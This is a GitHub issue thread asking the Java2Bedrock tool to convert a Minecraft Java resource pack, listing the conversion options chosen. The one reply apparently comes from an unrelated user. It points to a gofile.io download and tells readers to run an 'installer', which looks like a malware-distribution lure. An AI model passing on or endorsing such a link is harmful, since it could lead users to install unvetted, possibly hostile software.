### ISSUE TITLE
[Pack]: hihi

### ISSUE THREAD

**Issue by Sthuhai** [AZPixel-Team/Java2Bedrock#4757]
### Java Pack Direct Download URL

https://cdn.discordapp.com/attachments/1271168179036487731/1280877738609213494/generated.zip?ex=66d9adda&is=66d85c5a&hm=4eb3e221646f6b331767693ef300c7b34d05891f35eb4fd6aaa2cbb734f7193d&

### Default Assets Version

None

### Block Material

alpha_test

### Attachable Material

entity_alphatest_one_sided

### Archive Scratch Files

None

### Rename Model Files

None

### Font Conversion

false

### Armor Conversion

true

### Meg3 Fix

false

### Sounds Conversion

false

### Bow Conversion

true

### Shield Conversion

None

### Block Conversion

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by mahato098** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
